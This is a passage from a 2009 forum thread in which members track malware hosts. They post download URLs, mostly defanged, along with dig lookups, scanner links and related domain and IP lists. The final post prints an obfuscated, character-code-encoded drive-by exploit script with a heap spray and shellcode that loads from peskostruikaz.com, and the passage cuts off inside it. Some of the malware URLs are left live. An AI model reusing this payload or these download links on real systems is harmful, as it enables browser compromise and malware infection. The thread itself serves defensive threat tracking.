url13= hxxp://www.cvbnmdgesc.cn/13.exe
url14= hxxp://www.cvbnmdgesc.cn/14.exe
url15= hxxp://www.cvbnmdgesc.cn/15.exe
url16= hxxp://www.cvbnmdgesc.cn/16.exe
url17= hxxp://www.cvbnmdgesc.cn/17.exe
url18= hxxp://www.cvbnmdgesc.cn/18.exe
url19= hxxp://www.cvbnmdgesc.cn/19.exe
url20= hxxp://www.cvbnmdgesc.cn/20.exe
url21= hxxp://www.cvbnmdgesc.cn/21.exe
url22= hxxp://www.cvbnmdgesc.cn/22.exe
url23= hxxp://www.cvbnmdgesc.cn/23.exe
url24= hxxp://www.cvbnmdgesc.cn/24.exe
url25= hxxp://www.cvbnmdgesc.cn/25.exe
url26= hxxp://www.cvbnmdgesc.cn/26.exe
url27= hxxp://www.cvbnmdgesc.cn/27.exe
url28= hxxp://www.cvbnmdgesc.cn/28.exe
url29= hxxp://www.cvbnmdgesc.cn/29.exe
url30= hxxp://www.cvbnmdgesc.cn/30.exe
url31= hxxp://www.cvbnmdgesc.cn/31.exe
url32= hxxp://www.cvbnmdgesc.cn/32.exe
url33= hxxp://www.cvbnmdgesc.cn/33.exe
url34= hxxp://www.cvbnmdgesc.cn/34.exe
url35= hxxp://www.cvbnmdgesc.cn/35.exe
count=35



Code: [Select]
$ dig www.dfhjmfgergfds.cn +short
222.186.25.35

$ dig www.cvbnmdgesc.cn +short
222.186.25.35

MysteryFCM: Fixed CODE tags.
Title: Re: Mr Clean's dirt
Post by: SysAdMini on April 11, 2009, 11:46:02 am
Code: [Select]
url1= hxxp://www.cvbnmdgesc.cn/1.exe
..
Already added in the morning.  ;)
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 13, 2009, 11:27:06 am
Code: [Select]
hxxp://www.transport.net.cn/inc/main.js

$ dig www.transport.net.cn +short
202.104.113.55

http://wepawet.iseclab.org/view.php?hash=b2a8e4aa9bf27f7c61186c5d0fcdde87&t=1239621770&type=js


Code: [Select]
hxxp://w1.163.com7w.com/01/o.exe

$ dig w1.163.com7w.com +short
121.12.116.66

http://www.virustotal.com/analisis/f11deda1257b416b16a03ff280d51f6f 21/40

close relatives on 121.12.116.0/24 network
http://www.malwaredomainlist.com/mdl.php?search=121.12.116&colsearch=All&quantity=50

Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 13, 2009, 11:34:12 am
Code: [Select]
hxxp://www.lw7s.cn/image/qq.exe

$ dig www.lw7s.cn +short
98.126.8.2

http://www.virustotal.com/analisis/388b66140f0cc3bc7e391aa3de1d3210  35/40

Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 13, 2009, 11:37:09 am
Code: [Select]
http://dl.21dnf.cn/dnfly.exe

$ dig dl.21dnf.cn +short
121.12.105.163

http://www.virustotal.com/analisis/bedea6047cd98051978c6bbe777f1155 35/39
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 13, 2009, 11:40:32 am
Code: [Select]
hxxp://m1.bzbattery.cn/up/up.htm

$ dig m1.bzbattery.cn +short
98.126.8.2                     <-- same as www.lw7s.cn


http://www.virustotal.com/analisis/01e0d5f1ec0d2b0d44b8d1da313c13f8  9/39
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 13, 2009, 08:04:10 pm
Code: [Select]
hxxp://221.192.8.90/icons/wrm.png
$ file wrm.png
wrm.png: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

hxxp://221.192.8.90/icons/phr.png
$ file phr.png
phr.png: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

hxxp://221.192.8.90/icons/kl.png
$ file kl.png
kl.png: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

http://www.virustotal.com/analisis/2203fd0129c76dfc3ab71af8af37c9e4  7/35

http://www.virustotal.com/analisis/2296b2f50f40d42d9f82fd2bf6aa1459 25/40

http://www.virustotal.com/analisis/efb65e1a9e433e85b01d5e8f16b93df7 25/39




Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 13, 2009, 08:24:24 pm
Code: [Select]
hxxp://securedvirusscanner.com/download/Install_2006-60.exe

$ dig securedvirusscanner.com +short
212.117.165.126
78.47.172.66
94.76.213.227

http://www.virustotal.com/analisis/1f91b6bb3043cacdfbe112726a034773 0/21

http://www.malwaredomainlist.com/mdl.php?search=212.117.165&colsearch=All&quantity=50
http://www.malwaredomainlist.com/mdl.php?search=78.47.172.&colsearch=All&quantity=50
http://www.malwaredomainlist.com/mdl.php?search=94.76.213&colsearch=All&quantity=50

Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 13, 2009, 08:26:21 pm
Code: [Select]
hxxp://mixante.cn/in.cgi?income55

$ dig mixante.cn +short
94.247.3.150

http://anubis.iseclab.org/?action=result&task_id=1871940bf2bae17c489b6fd571484c3b0&format=html
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 13, 2009, 08:46:44 pm
Code: [Select]
http://dasretokfin.com/index.php

$ dig dasretokfin.com +short
95.129.144.228

malicous js
http://wepawet.iseclab.org/view.php?hash=ad13e2d0b2aa517342cdf4b1dd897377&t=1238387964&type=js

malicious pdf
http://wepawet.iseclab.org/view.php?hash=2b0e81286d6fd2ad76f3ce55bc0b7b0b&t=1239655549&type=js
http://anubis.iseclab.org/?action=result&task_id=1158fe86293a81934bd467e2ccbd668cb&format=html

http://www.malwaredomainlist.com/mdl.php?search=95.129.144.&colsearch=All&quantity=50
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 13, 2009, 10:19:47 pm
Code: [Select]
hxxp://codecvistaz.com/codec/185.exe

$ dig codecvistaz.com +short
194.165.4.77

http://www.virustotal.com/analisis/0c902ffb816c7ca158f8c4e709fceb21

domain already known
nasty network
http://www.malwaredomainlist.com/mdl.php?search=194.165.4&colsearch=All&quantity=50
Title: Re: Mr Clean's dirt
Post by: CkreM on April 14, 2009, 12:17:54 am
Code: [Select]
http://dasretokfin.com/index.php

$ dig dasretokfin.com +short
95.129.144.228

malicous js
http://wepawet.iseclab.org/view.php?hash=ad13e2d0b2aa517342cdf4b1dd897377&t=1238387964&type=js

malicious pdf
http://wepawet.iseclab.org/view.php?hash=2b0e81286d6fd2ad76f3ce55bc0b7b0b&t=1239655549&type=js
http://anubis.iseclab.org/?action=result&task_id=1158fe86293a81934bd467e2ccbd668cb&format=html

http://www.malwaredomainlist.com/mdl.php?search=95.129.144.&colsearch=All&quantity=50


leads to zbot now
roasocks.com/ldr.exe
roasocks.com/cfg.bin
roasocks.com/cfg2.bin
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 14, 2009, 01:03:43 pm
Code: [Select]
hxxp://biao.jijiyy1144.cn/liebiao/biao.txt

$ cat biao.txt | sort | uniq
hxxp://121.14.142.71/q1q1q1q1q1q1q1q1q1q1/10.exe
hxxp://121.14.142.71/q1q1q1q1q1q1q1q1q1q1/11.exe
hxxp://121.14.142.71/q1q1q1q1q1q1q1q1q1q1/12.exe
hxxp://121.14.142.71/q1q1q1q1q1q1q1q1q1q1/13.exe
hxxp://121.14.142.71/q1q1q1q1q1q1q1q1q1q1/14.exe
hxxp://121.14.142.71/q1q1q1q1q1q1q1q1q1q1/15.exe
hxxp://121.14.142.71/q1q1q1q1q1q1q1q1q1q1/16.exe
hxxp://121.14.142.71/q1q1q1q1q1q1q1q1q1q1/17.exe
hxxp://121.14.142.71/q1q1q1q1q1q1q1q1q1q1/18.exe
hxxp://121.14.142.71/q1q1q1q1q1q1q1q1q1q1/19.exe
hxxp://121.14.142.71/q1q1q1q1q1q1q1q1q1q1/1.exe
hxxp://121.14.142.71/q1q1q1q1q1q1q1q1q1q1/20.exe
hxxp://121.14.142.71/q1q1q1q1q1q1q1q1q1q1/21.exe
hxxp://121.14.142.71/q1q1q1q1q1q1q1q1q1q1/22.exe
hxxp://121.14.142.71/q1q1q1q1q1q1q1q1q1q1/23.exe
hxxp://121.14.142.71/q1q1q1q1q1q1q1q1q1q1/24.exe
hxxp://121.14.142.71/q1q1q1q1q1q1q1q1q1q1/25.exe
hxxp://121.14.142.71/q1q1q1q1q1q1q1q1q1q1/26.exe
hxxp://121.14.142.71/q1q1q1q1q1q1q1q1q1q1/27.exe
hxxp://121.14.142.71/q1q1q1q1q1q1q1q1q1q1/28.exe
hxxp://121.14.142.71/q1q1q1q1q1q1q1q1q1q1/29.exe
hxxp://121.14.142.71/q1q1q1q1q1q1q1q1q1q1/2.exe
hxxp://121.14.142.71/q1q1q1q1q1q1q1q1q1q1/30.exe
hxxp://121.14.142.71/q1q1q1q1q1q1q1q1q1q1/3.exe
hxxp://121.14.142.71/q1q1q1q1q1q1q1q1q1q1/45.exe
hxxp://121.14.142.71/q1q1q1q1q1q1q1q1q1q1/46.dll
hxxp://121.14.142.71/q1q1q1q1q1q1q1q1q1q1/47.dll
hxxp://121.14.142.71/q1q1q1q1q1q1q1q1q1q1/48.dll
hxxp://121.14.142.71/q1q1q1q1q1q1q1q1q1q1/49.dll
hxxp://121.14.142.71/q1q1q1q1q1q1q1q1q1q1/4.exe
hxxp://121.14.142.71/q1q1q1q1q1q1q1q1q1q1/51.dll
hxxp://121.14.142.71/q1q1q1q1q1q1q1q1q1q1/5.exe
hxxp://121.14.142.71/q1q1q1q1q1q1q1q1q1q1/6.exe
hxxp://121.14.142.71/q1q1q1q1q1q1q1q1q1q1/7.exe
hxxp://121.14.142.71/q1q1q1q1q1q1q1q1q1q1/8.exe
hxxp://121.14.142.71/q1q1q1q1q1q1q1q1q1q1/9.exe
hxxp://121.14.142.71/q1q1q1q1q1q1q1q1q1q1/a.exe
hxxp://121.14.142.71/q1q1q1q1q1q1q1q1q1q1/b.exe
hxxp://121.14.142.71/q1q1q1q1q1q1q1q1q1q1/c.exe
hxxp://121.14.142.71/q1q1q1q1q1q1q1q1q1q1/d.exe
hxxp://121.14.142.71/q1q1q1q1q1q1q1q1q1q1/e.exe
hxxp://121.14.142.71/q1q1q1q1q1q1q1q1q1q1/f.exe
hxxp://121.14.142.71/q1q1q1q1q1q1q1q1q1q1/g.exe
hxxp://121.14.142.71/q1q1q1q1q1q1q1q1q1q1/h.exe
hxxp://121.14.142.71/q1q1q1q1q1q1q1q1q1q1/hun.dll
hxxp://121.14.142.71/q1q1q1q1q1q1q1q1q1q1/i.exe
hxxp://121.14.142.71/q1q1q1q1q1q1q1q1q1q1/j.exe
hxxp://121.14.142.71/q1q1q1q1q1q1q1q1q1q1/k.exe
hxxp://121.14.142.71/q1q1q1q1q1q1q1q1q1q1/kill.exe
hxxp://121.14.142.71/q1q1q1q1q1q1q1q1q1q1/l.exe
hxxp://121.14.142.71/q1q1q1q1q1q1q1q1q1q1/m.exe
hxxp://121.14.142.71/q2q2q2q2q2q2q2q2q2q2/av.exe
hxxp://xxx.elcakorea.co.kr/8888888888888888888888888888.exe

Code: [Select]
$ dig biao.jijiyy1144.cn +short
121.14.142.71

$ dig xxx.elcakorea.co.kr +short
208.67.217.132

http://www.bfk.de/bfk_dnslogger.html?query=121.14.142.71#result
Code: [Select]
qqqqqqqwww.3322.org A 121.14.142.71
feifan.jijiyy741.cn A 121.14.142.71
y.yyttjjyy1122.cn A 121.14.142.71
download.maxjust123.cn A 121.14.142.71
biao.jijiyy1144.cn A 121.14.142.71
mmwyt.qqwweee1155.cn A 121.14.142.71
niouniou.qqwweee555.cn A 121.14.142.71
qvod.xxoo888.cn A 121.14.142.71
avast.maxjust999.cn A 121.14.142.71
chiyuming.dingbisb.cn A 121.14.142.71
damingwww.dingleisb.cn A 121.14.142.71
down.dllqvod.cn A 121.14.142.71
huniouniou.kkhhkkhh.cn A 121.14.142.71
avast.sbdingbi.cn A 121.14.142.71
babale.avp360.mo.cn A 121.14.142.71
ying154.sport.mo.cn A 121.14.142.71
suoyoutongji.gangangan.tw.cn A 121.14.142.71
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 14, 2009, 05:08:25 pm
Code: [Select]
hxxp://193.33.61.224/css/pdf.php?new=3&u=i_7_0&cc=US&st=3uqd&tm=000013&r=r29s9gkdn

Referrer: hxxp://x-playing.com/?advrtsid=adid0130

$ dig x-playing.com +short
193.33.61.243

http://wepawet.iseclab.org/view.php?hash=6888b96e1202a27a93e4291114f3db79&type=js
http://www.virustotal.com/analisis/78cf30b945da7437178773bb022333f6 3/36

http://www.malwaredomainlist.com/mdl.php?search=193.33.61&colsearch=All&quantity=50


Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 14, 2009, 05:34:47 pm
Code: [Select]
hxxp://xtrarobotz.com/liloadercdi.php?id=409179&spl=3

file = llllload.exe

http://anubis.iseclab.org/?action=result&task_id=13c06f060a35ab9b4c10cadb617927f75&format=html

http://www.virustotal.com/analisis/e2384c16012721191fbf4a804803c571 22/40

http://www.bfk.de/bfk_dnslogger.html?query=xtrarobotz.com#result

Well well, will ya look at this!
Code: [Select]
xtrarobotz.com A 67.126.85.67
xtrarobotz.com A 70.121.34.2
xtrarobotz.com A 75.74.112.171
xtrarobotz.com A 76.17.253.244
xtrarobotz.com A 77.81.83.142
xtrarobotz.com A 77.81.114.109
xtrarobotz.com A 79.112.2.3
xtrarobotz.com A 79.112.54.145
xtrarobotz.com A 79.112.56.191
xtrarobotz.com A 79.112.97.102
xtrarobotz.com A 79.112.228.236
xtrarobotz.com A 79.113.74.250
xtrarobotz.com A 79.113.199.119
xtrarobotz.com A 79.119.96.136
xtrarobotz.com A 79.119.240.163
xtrarobotz.com A 82.79.161.152
xtrarobotz.com A 86.123.194.234
xtrarobotz.com A 89.37.197.51
xtrarobotz.com A 89.39.253.61
xtrarobotz.com A 89.208.209.112
xtrarobotz.com A 93.113.179.137
xtrarobotz.com A 94.52.75.21
xtrarobotz.com A 96.51.161.186
xtrarobotz.com A 99.236.49.190
xtrarobotz.com A 116.99.0.73
xtrarobotz.com A 188.24.15.217
xtrarobotz.com A 188.24.230.208
xtrarobotz.com A 194.0.124.222
xtrarobotz.com A 201.172.151.86
xtrarobotz.com A 212.225.140.233
xtrarobotz.com NS ns1.generalll.com
xtrarobotz.com NS ns2.generalll.com
xtrarobotz.com NS ns3.generalll.com
xtrarobotz.com NS ns4.generalll.com
xtrarobotz.com NS ns5.generalll.com


Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 15, 2009, 11:41:36 am
Code: [Select]
hxxp://l.uye123.com/list.txt

$ dig l.uye123.com +short
121.12.116.4
$ dig u7.hux7.com +short
121.12.116.82

http://www.malwaredomainlist.com/mdl.php?search=121.12.116&colsearch=All&quantity=50 (43 reports)

Code: [Select]
$ cat list.txt
hxxp://u3.hux7.com/lm/S10.exe
hxxp://u3.hux7.com/lm/S1.exe
hxxp://u3.hux7.com/lm/S8.exe
hxxp://u3.hux7.com/lm/S2.exe
hxxp://u3.hux7.com/lm/S12.exe
hxxp://u3.hux7.com/lm/S14.exe
hxxp://u3.hux7.com/lm/S15.exe
hxxp://u3.hux7.com/lm/S13.exe
hxxp://u3.hux7.com/lm/S16.exe
hxxp://u3.hux7.com/lm/S17.exe
hxxp://u3.hux7.com/lm/S20.exe
hxxp://u3.hux7.com/lm/S21.exe
hxxp://u3.hux7.com/lm/S11.exe
hxxp://u7.hux7.com/cj/a1.exe
hxxp://u2.hux7.com/gz/G2.exe
hxxp://u2.hux7.com/gz/G5.exe
hxxp://u2.hux7.com/gz/G4.exe
hxxp://u2.hux7.com/gz/Gx1.exe
hxxp://u2.hux7.com/gz/G39.exe
hxxp://u2.hux7.com/gz/G33.exe
hxxp://u2.hux7.com/gz/G25.exe
hxxp://u2.hux7.com/gz/G7.exe
hxxp://u2.hux7.com/gz/G35.exe
hxxp://u2.hux7.com/gz/G37.exe
hxxp://u2.hux7.com/gz/Gx5.exe
hxxp://u2.hux7.com/gz/G24.exe
hxxp://u2.hux7.com/gz/G9.exe
hxxp://u2.hux7.com/gz/G38.exe
hxxp://u2.hux7.com/gz/G21.exe
hxxp://u2.hux7.com/gz/G29.exe
hxxp://u2.hux7.com/gz/G17.exe
hxxp://u2.hux7.com/gz/G23.exe
hxxp://u9.hux7.com/cj/a2.exe
hxxp://u9.hux7.com/cj/a10.exe
hxxp://u9.hux7.com/cj/a6.exe
hxxp://u7.hux7.com/cj/a9.exe
hxxp://u7.hux7.com/cj/csj.exe
hxxp://u0.hux7.com/cj/a8.exe
hxxp://u0.hux7.com/cj/sb1.exe
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 15, 2009, 11:47:30 am
Code: [Select]
hxxp://3.meng3130.cn/cs/ok.exe

$ dig 3.meng3130.cn +short
125.91.13.224

http://www.virustotal.com/analisis/69400d3e7355aae911b8c81a86324b47 22/39


Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 16, 2009, 05:56:26 pm
Code: [Select]
hxxp://files.ms-load-top-files.com/exe/setup_200093_1_1.exe

$ dig files.ms-load-top-files.com +short
ms-load-top-files.com.
195.88.81.74

$ dig ms-load-top-files.com +short
195.88.81.74

http://www.virustotal.com/analisis/f70d4a01f071f840873dd407e4597703 12/40

http://www.malwaredomainlist.com/mdl.php?search=195.88.81&colsearch=All&quantity=50
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 16, 2009, 06:29:08 pm
http://anubis.iseclab.org/?action=result&task_id=18767fadc009bb0b455562fcb8d18de54&format=html

Code: [Select]
hxxp://int.proreportms1.com/stat.php?func=installrun&id=200093&landing=-1&lang=EN&sub=1

$ dig int.proreportms1.com +short
proreportms1.com.
195.88.80.207

$ dig proreportms1.com +short
195.88.80.207

http://www.malwaredomainlist.com/mdl.php?search=195.88.80&colsearch=All&quantity=50


Code: [Select]
hxxp://dl.top-scan-ms-storage.com/get/?pin=0&lnd=0&type=main
hxxp://dl.top-scan-ms-storage.com/get/?pin=200093&lnd=-1&type=main
hxxp://dl.top-scan-ms-storage.com/get/?pin=200093&lnd=-1&type=main

$ dig dl.top-scan-ms-storage.com +short
top-scan-ms-storage.com.
195.88.81.116

$ dig top-scan-ms-storage.com +short
195.88.81.116

http://www.malwaredomainlist.com/mdl.php?search=195.88.81&colsearch=All&quantity=50
Title: Re: Mr Clean's dirt
Post by: Mr Clean on April 16, 2009, 06:39:16 pm
Code: [Select]
hxxp://msscanner-top-pc.com/200093/scan

$ dig msscanner-top-pc.com +short
195.88.81.93

http://wepawet.iseclab.org/view.php?hash=708029721cdb29d9fc6930054d427851&t=1239907315&type=js

http://www.malwaredomainlist.com/mdl.php?search=195.88.81&colsearch=All&quantity=50

http://www.bfk.de/bfk_dnslogger.html?query=195.88.81.93#result
Title: Re: Mr Clean's dirt
Post by: RS-232 on April 16, 2009, 07:00:42 pm
Quote
http://www.bfk.de/bfk_dnslogger.html?query=xtrarobotz.com#result
Well well, will ya look at this!

What the heck is this one again...anyway,found couple more stuff from it's current ips,merely via googling:
http://www.bfk.de/bfk_dnslogger.html?query=peskostruikaz.com#result

Code: [Select]
hxxp://peskostruikaz.com/?click=4297D
hxxp://peskostruikaz.com/?click=5364991
hxxp://peskostruikaz.com/p1d2f3.php?id=464555
hxxp://peskostruikaz.com/?click=C4DB82
hxxp://peskostruikaz.com/?click=10813A4
hxxp://peskostruikaz.com/?click=1EEFF7B
hxxp://openstats.info/counter3.swf

Pdf results...
http://www.virustotal.com/analisis/d7edb9e0ef21f6ac3d1bb91a0eccbc10
Swf results...
http://www.virustotal.com/analisis/2a2ff89c63bfab7b2a3358108ec7237a
Title: Re: Mr Clean's dirt
Post by: RS-232 on April 16, 2009, 07:23:22 pm
Code: [Select]
<script>function gluerr(){returntrue;}window.onerror=gluerr;var g="wQiSn+d+o+wQ.+e+vQaQlS";g=g.replace(/[\+u0SQ]/g,"");</script><style>.gbbZwrUnZ{display:none;}</style><b class="gbbZwrUnZ"id="gbbZwrUnZ">13#10#118#97#114#32#117#114#108#61#34#104#116#116#112#58#47#47#112#101#115#107#111#115#116#114#117#105#107#97#122#46#99#111#109#47#108#105#108#111#97#100#101#114#99#100#105#46#112#104#112#63#105#100#61#53#53#53#54#57#53#34#59#13#10#118#97#114#32#109#61#110#101#119#32#65#114#114#97#121#40#41#59#13#10#118#97#114#32#109#102#61#48#59#13#10#102#117#110#99#116#105#111#110#32#104#101#120#40#110#117#109#44#119#105#100#116#104#41#123#13#10#118#97#114#32#100#105#103#105#116#115#61#34#48#49#50#51#52#53#54#55#56#57#65#66#67#68#69#70#34#59#13#10#118#97#114#32#104#101#120#61#100#105#103#105#116#115#46#115#117#98#115#116#114#40#110#117#109#38#48#120#70#44#49#41#59#13#10#119#104#105#108#101#40#110#117#109#62#48#120#70#41#123#13#10#110#117#109#61#110#117#109#62#62#62#52#59#13#10#104#101#120#61#100#105#103#105#116#115#46#115#117#98#115#116#114#40#110#117#109#38#48#120#70#44#49#41#43#104#101#120#59#13#10#125#13#10#118#97#114#32#119#105#100#116#104#61#40#119#105#100#116#104#63#119#105#100#116#104#58#48#41#59#13#10#119#104#105#108#101#40#104#101#120#46#108#101#110#103#116#104#60#119#105#100#116#104#41#104#101#120#61#34#48#34#43#104#101#120#59#13#10#114#101#116#117#114#110#32#104#101#120#59#13#10#125#13#10#102#117#110#99#116#105#111#110#32#97#100#100#114#40#97#100#100#114#41#123#13#10#114#101#116#117#114#110#32#117#110#101#115#99#97#112#101#40#34#37#117#34#43#104#101#120#40#97#100#100#114#38#48#120#70#70#70#70#44#52#41#43#34#37#117#34#43#104#101#120#40#40#97#100#100#114#62#62#49#54#41#38#48#120#70#70#70#70#44#52#41#41#59#13#10#125#13#10#102#117#110#99#116#105#111#110#32#117#110#101#115#40#115#116#114#41#123#13#10#118#97#114#32#116#109#112#61#34#34#59#13#10#102#111#114#40#118#97#114#32#105#61#48#59#105#60#115#116#114#46#108#101#110#103#116#104#59#105#43#61#52#41#123#13#10#116#109#112#43#61#97#100#100#114#40#40#115#116#114#46#99#104#97#114#67#111#100#101#65#116#40#105#43#51#41#60#60#50#52#41#43#13#10#40#115#116#114#46#99#104#97#114#67#111#100#101#65#116#40#105#43#50#41#60#60#49#54#41#43#13#10#40#115#116#114#46#99#104#97#114#67#111#100#101#65#116#40#105#43#49#41#60#60#56#41#43#13#10#115#116#114#46#99#104#97#114#67#111#100#101#65#116#40#105#41#41#59#13#10#125#13#10#114#101#116#117#114#110#32#117#110#101#115#99#97#112#101#40#116#109#112#41#59#13#10#125#13#10#102#117#110#99#116#105#111#110#32#104#97#118#40#41#123#13#10#109#61#109#59#13#10#115#101#116#84#105#109#101#111#117#116#40#34#104#97#118#40#41#34#44#49#48#48#48#41#59#13#10#125#13#10#102#117#110#99#116#105#111#110#32#103#115#115#40#115#115#44#115#115#115#41#123#13#10#119#104#105#108#101#40#115#115#46#108#101#110#103#116#104#42#50#60#115#115#115#41#115#115#43#61#115#115#59#13#10#115#115#61#115#115#46#115#117#98#115#116#114#105#110#103#40#48#44#115#115#115#47#50#41#59#13#10#114#101#116#117#114#110#32#115#115#59#13#10#125#13#10#102#117#110#99#116#105#111#110#32#109#115#40#41#123#13#10#118#97#114#32#112#108#99#61#117#110#101#115#99#97#112#101#40#34#37#117#52#51#52#51#37#117#52#51#52#51#37#117#52#51#52#51#37#117#48#70#69#66#37#117#51#51#53#66#37#117#54#54#67#57#37#117#56#48#66#57#37#117#56#48#48#49#37#117#69#70#51#51#37#117#69#50#52#51#37#117#69#66#70#65#37#117#69#56#48#53#37#117#70#70#69#67#37#117#70#70#70#70#37#117#56#66#55#70#37#117#68#70#52#69#37#117#69#70#69#70#37#117#54#52#69#70#37#117#69#51#65#70#37#117#57#70#54#52#37#117#52#50#70#51#37#117#57#70#54#52#37#117#54#69#69#55#37#117#69#70#48#51#37#117#69#70#69#66#37#117#54#52#69#70#37#117#66#57#48#51#37#117#54#49#56#55#37#117#69#49#65#49#37#117#48#55#48#51#37#117#69#70#49#49#37#117#69#70#69#70#37#117#65#65#54#54#37#117#66#57#69#66#37#117#55#55#56#55#37#117#54#53#49#49#37#117#48#55#69#49#37#117#69#70#49#70#37#117#69#70#69#70#37#117#65#65#54#54#37#117#66#57#69#55#37#117#67#65#56#55#37#117#49#48#53#70#37#117#48#55#50#68#37#117#69#70#48#68#37#117#69#70#69#70#37#117#65#65#54#54#37#117#66#57#69#51#37#117#48#48#56#55#37#117#48#70#50#49#37#117#48#55#56#70#37#117#69#70#51#66#37#117#69#70#69#70#37#117#65#65#54#54#37#117#66#57#70#70#37#117#50#69#56#55#37#117#48#65#57#54#37#117#48#55#53#55#37#117#69#70#50#57#37#117#69#70#69#70#37#117#65#65#54#54#37#117#65#70#70#66#37#117#68#55#54#70#37#117#57#65#50#67#37#117#54#54#49#53#37#117#70#55#65#65#37#117#69#56#48#54#37#117#69#70#69#69#37#117#66#49#69#70#37#117#57#65#54#54#37#117#54#52#67#66#37#117#69#66#65#65#37#117#69#69#56#53#37#117#54#52#66#54#37#117#70#55#66#65#37#117#48#55#66#57#37#117#69#70#54#52#37#117#69#70#69#70#37#117#56#55#66#70#37#117#70#53#68#57#37#117#57#70#67#48#37#117#55#56#48#55#37#117#69#70#69#70#37#117#54#54#69#70#37#117#70#51#65#65#37#117#50#65#54#52#37#117#50#70#54#67#37#117#54#54#66#70#37#117#67#70#65#65#37#117#49#48#56#55#37#117#69#70#69#70#37#117#66#70#69#70#37#117#65#65#54#52#37#117#56#53#70#66#37#117#66#54#69#68#37#117#66#65#54#52#37#117#48#55#70#55#37#117#69#70#56#69#37#117#69#70#69#70#37#117#65#65#69#67#37#117#50#56#67#70#37#117#66#51#69#70#37#117#67#49#57#49#37#117#50#56#56#65#37#117#69#66#65#70#37#117#56#65#57#55#37#117#69#70#69#70#37#117#57#65#49#48#37#117#54#52#67#70#37#117#69#51#65#65#37#117#69#69#56#53#37#117#54#52#66#54#37#117#70#55#66#65#37#117#65#70#48#55#37#117#69#70#69#70#37#117#56#53#69#70#37#117#66#55#69#56#37#117#65#65#69#67#37#117#68#67#67#66#37#117#66#67#51#52#37#117#49#48#66#67#37#117#67#70#57#65#37#117#66#67#66#70#37#117#65#65#54#52#37#117#56#53#70#51#37#117#66#54#69#65#37#117#66#65#54#52#37#117#48#55#70#55#37#117#69#70#67#67#37#117#69#70#69#70#37#117#69#70#56#53#37#117#57#65#49#48#37#117#54#52#67#70#37#117#69#55#65#65#37#117#69#68#56#53#37#117#54#52#66#54#37#117#70#55#66#65#37#117#70#70#48#55#37#117#69#70#69#70#37#117#56#53#69#70#37#117#54#52#49#48#37#117#70#70#65#65#37#117#69#69#56#53#37#117#54#52#66#54#37#117#70#55#66#65#37#117#69#70#48#55#37#117#69#70#69#70#37#117#65#69#69#70#37#117#66#68#66#52#37#117#48#69#69#67#37#117#48#69#69#67#37#117#48#69#69#67#37#117#48#69#69#67#37#117#48#51#54#67#37#117#66#53#69#66#37#117#54#52#66#67#37#117#48#68#51#53#37#117#66#68#49#56#37#117#48#70#49#48#37#117#54#52#66#65#37#117#54#52#48#51#37#117#69#55#57#50#37#117#66#50#54#52#37#117#66#57#69#51#37#117#57#67#54#52#37#117#54#52#68#51#37#117#70#49#57#66#37#117#69#67#57#55#37#117#66#57#49#67#37#117#57#57#54#52#37#117#69#67#67#70#37#117#68#67#49#67#37#117#65#54#50#54#37#117#52#50#65#69#37#117#50#67#69#67#37#117#68#67#66#57#37#117#69#48#49#57#37#117#70#70#53#49#37#117#49#68#68#53#37#117#69#55#57#66#37#117#50#49#50#69#37#117#69#67#69#50#37#117#65#70#49#68#37#117#49#69#48#52#37#117#49#49#68#52#37#117#57#65#66#49#37#117#66#53#48#65#37#117#48#52#54#52#37#117#66#53#54#52#37#117#69#67#67#66#37#117#56#57#51#50#37#117#69#51#54#52#37#117#54#52#65#52#37#117#70#51#66#53#37#117#51#50#69#67#37#117#69#66#54#52#37#117#69#67#54#52#37#117#66#49#50#65#37#117#50#68#66#50#37#117#69#70#69#55#37#117#49#66#48#55#37#117#49#48#49#49#37#117#66#65#49#48#37#117#65#51#66#68#37#117#65#48#65#50#37#117#69#70#65#49#37#117#55#52#54#56#37#117#55#48#55#52#37#117#50#70#51#65#37#117#55#48#50#70#37#117#55#51#54#53#37#117#54#70#54#66#37#117#55#52#55#51#37#117#55#53#55#50#37#117#54#66#54#57#37#117#55#65#54#49#37#117#54#51#50#69#37#117#54#68#54#70#37#117#54#67#50#70#37#117#54#67#54#57#37#117#54#49#54#70#37#117#54#53#54#52#37#117#54#51#55#50#37#117#54#57#54#52#37#117#55#48#50#69#37#117#55#48#54#56#37#117#54#57#51#70#37#117#51#68#54#52#37#117#51#53#51#53#37#117#51#54#51#53#37#117#51#53#51#57#34#41#59#13#10#67#111#108#108#101#99#116#71#97#114#98#97#103#101#40#41#59#13#10#105#102#32#40#109#102#41#114#101#116#117#114#110#40#48#41#59#13#10#109#102#61#49#59#13#10#118#97#114#32#104#115#116#97#61#48#120#48#99#48#99#48#99#48#99#44#104#98#115#61#48#120#49#48#48#48#48#48#44#112#108#61#112#108#99#46#108#101#110#103#116#104#42#50#44#115#115#115#61#104#98#115#45#40#112#108#43#48#120#51#56#41#59#13#10#118#97#114#32#115#115#61#103#115#115#40#97#100#100#114#40#104#115#116#97#41#44#115#115#115#41#44#104#98#61#40#104#115#116#97#45#104#98#115#41#47#104#98#115#59#13#10#102#111#114#40#105#61#48#59#105#60#104#98#59#105#43#43#41#109#91#105#93#61#115#115#43#112#108#99#59#13#10#104#97#118#40#41#59#13#10#114#101#116#117#114#110#40#49#41#59#13#10#125#13#10#102#117#110#99#116#105#111#110#32#99#111#98#106#40#111#98#106#41#123#13#10#118#97#114#32#114#101#116#61#110#117#108#108#59#13#10#105#102#40#111#98#106#46#115#117#98#115#116#114#105#110#103#40#48#44#49#41#61#61#34#123#34#41#123#13#10#116#114#121#123#13#10#118#97#114#32#99#108#115#105#100#61#111#98#106#46#115#117#98#115#116#114#105#110#103#40#49#44#111#98#106#46#108#101#110#